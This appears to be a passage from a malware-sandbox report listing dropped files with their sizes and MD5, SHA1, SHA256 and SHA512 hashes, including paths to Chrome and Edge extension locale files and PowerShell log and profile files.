MD5: b26dfe732b374c3586457d143b94ae33
SHA1: cf21751f66bd93fbed5bc3451f4891191e17a1e4
SHA256: b33a1d15d16d7342a4224658432257b4d19b5160fca4cd073a0d3592cfb8941a
SHA512: 9d188024cc975ec48aeec4234f9614c075157d44f42e9d5a1888f0eed6c241eeb09abc15e42469896ffb483807d9c171ad0563ecc7819539ed35d52b9566a452

Filesize: 2KB
MD5: 9e206284495b67fa16ff1c328a9d3d60
SHA1: 583f710902c4c748a474bfc2bb11c5e2bfbfa622
SHA256: 67a9620b82ad217e08a24b142bb2c737385718ea2fc6711b17345a3efc08ef0b
SHA512: 2425e5d10b16709dfdcca61d68f31db4232bd05a2de4ef7931d47646416ba0d36b8a938276d40fd18d0f3af24da2237bb00eaa26aff77f39a50749f76e344e24

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize: 187B
MD5: 2a1e12a4811892d95962998e184399d8
SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize: 136B
MD5: 238d2612f510ea51d0d3eaa09e7136b1
SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize: 150B
MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1: 6a51537cef82143d3d768759b21598542d683904
SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Filesize: 12KB
MD5: 4493b063ac775ef40101f95086e4d5ef
SHA1: 721a9b80dde39acb367e207c98ae7794d84f15ad
SHA256: 17ed2c617073e3ad74f682647b511ac036420521f7d27163c4c3da367964fdb4
SHA512: cdc7dfcfc3c3f93e02b2a92871ed4a9b037cd346851472779df1aca830dc000587e55e7df1fc6215e6fac3f257038a92abaa81af687c0c1bfc15a207b0829148

Filesize: 2KB
MD5: 6cf293cb4d80be23433eecf74ddb5503
SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\abgdohlnibdejcajjfmngebmdanjldcc\1.2_0\_locales\es\messages.json
Filesize: 151B
MD5: bd6b60b18aee6aaeb83b35c68fb48d88
SHA1: 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256: b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512: 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Filesize: 6KB
MD5: 72b3fd59d0a10a1fa3ae3f976ebe934a
SHA1: 6137481fe5fb432f71e3bea44edd0b3c218efc14
SHA256: ec17728ffdee26eb6ecad5ad85346540c2dcc5519168586c86f4b3d7319e7bb6
SHA512: fc51e8ae40725c83d7c5b825b7a252da3b6e3e697e285ffed01c0561bc3c6d356ae8e4162db5a0fd4197b054019f56cf40121ab0a491328591a44dc6adcf8e8f

Filesize: 64B
MD5: a6c9d692ed2826ecb12c09356e69cc09
SHA1: def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256: a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512: 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Filesize: 6.3MB
MD5: 260daa3fec9cec2b44e09a0e08b93a21
SHA1: 2cad259d0fd2b05d43f0c932bb70dd2d70817204
SHA256: d831a74114d51d3b7fc512dc790516e7771396041be9633d187553cae8fa7ea2
SHA512: 61114432a2f3eed564110148a96847c4f32e72575ddbbab28f7499acd7ba423b654c974afb0729933984a2ff8668934379ffa3ac2902cf38478b2935a6834870

Filesize: 6.3MB
MD5: 260daa3fec9cec2b44e09a0e08b93a21
SHA1: 2cad259d0fd2b05d43f0c932bb70dd2d70817204
SHA256: d831a74114d51d3b7fc512dc790516e7771396041be9633d187553cae8fa7ea2
SHA512: 61114432a2f3eed564110148a96847c4f32e72575ddbbab28f7499acd7ba423b654c974afb0729933984a2ff8668934379ffa3ac2902cf38478b2935a6834870

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 7KB
MD5: 34a4d5a59ceee044d94f72410e8b688d
SHA1: 1ecea081813b0b432048496e45db0d9da5563576
SHA256: cf7476580c4ddc1e883e228ddbf9b840178dbbafe57f4c6209fe74bffba7479e
SHA512: a352bd800e1c6197c72004cc5ec2eacf5df022c8f30bca90635fb8442a84fcaa2cfd021eadc43bfb677a201557709d5a65278807215e0d9d894ecd7ee26a7e28

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize: 1KB
MD5: 33b19d75aa77114216dbc23f43b195e3
SHA1: 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256: b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512: 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 11KB
MD5: ba78170aa424ea1e61848aa573ffcbf4
SHA1: d21cc99e8171abd5cfd3d535f083ddb3d85e0415
SHA256: 80bbbdbac022fbdfe76f39cdfb1cd5a0f2ad216921c2cf3846b41f535c73dfe5
SHA512: 7840321bfd210a64c5a61ed565852e27f3aad05f8708ad2f620ba30311bdfe5183619264cd1413dafeda6a77d7bda66d7fdcbf07d0eee17d385531434413863f

Filesize: 6.1MB
MD5: bcdad82817cf7040575e753c1146ec87
SHA1: 2c776d0c9d5718f16c0d7d4011e88f3a32b7a6a1
SHA256: 9d82cfbaf837e98c15cd61438c27a67c696f683cb8c3dc1f4b4a2cad27525f1b
SHA512: 8e7c3776af0e6625e4a03b2450c866638ae7272cb8d137b3d83069e447b9bfe0ce26fd71f26505d28753a5ac7edf324897d9d3497e8775e96f7dff3fdfa090c6

Filesize: 6.1MB
MD5: bcdad82817cf7040575e753c1146ec87
SHA1: 2c776d0c9d5718f16c0d7d4011e88f3a32b7a6a1
SHA256: 9d82cfbaf837e98c15cd61438c27a67c696f683cb8c3dc1f4b4a2cad27525f1b
SHA512: 8e7c3776af0e6625e4a03b2450c866638ae7272cb8d137b3d83069e447b9bfe0ce26fd71f26505d28753a5ac7edf324897d9d3497e8775e96f7dff3fdfa090c6

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 6.8MB
MD5: 482fc087127ddfab79bf97cae6575e36
SHA1: d4e8bad09715deb943b9cdcaca2aba06d0919c04
SHA256: 071d1646f40bc208e1a0d3a0e6040298ced57db51d14b5b3d5dbca8d8215c0bb
SHA512: 337621034183a497774f57cb0db47047643a1fad482dcadd0aa73015b8a3987bae46f25821b8941dfff4bde5008bb55d22472d85ddf3e90ada70862a8916940a

Filesize: 6KB
MD5: 6f9484016a36d3f0cd43fa9b2833663f
SHA1: 9f4fece19cd36c33cab6faa25e96e4f2f7c0d0c9
SHA256: cc2515b0df3e3b8d712b134b0471db3f05150c47373a2da6af65b24d60b2ce38
SHA512: 77a7234c0e142921d83c6b14c473853e120693f47d1280e6f547826f9be35f505fd40d0c58e36005569218016eb59f98015f6a92fd0dc014f4f7ded3b9a9c90b

Filesize: 268B
MD5: a62ce44a33f1c05fc2d340ea0ca118a4
SHA1: 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256: 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512: 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732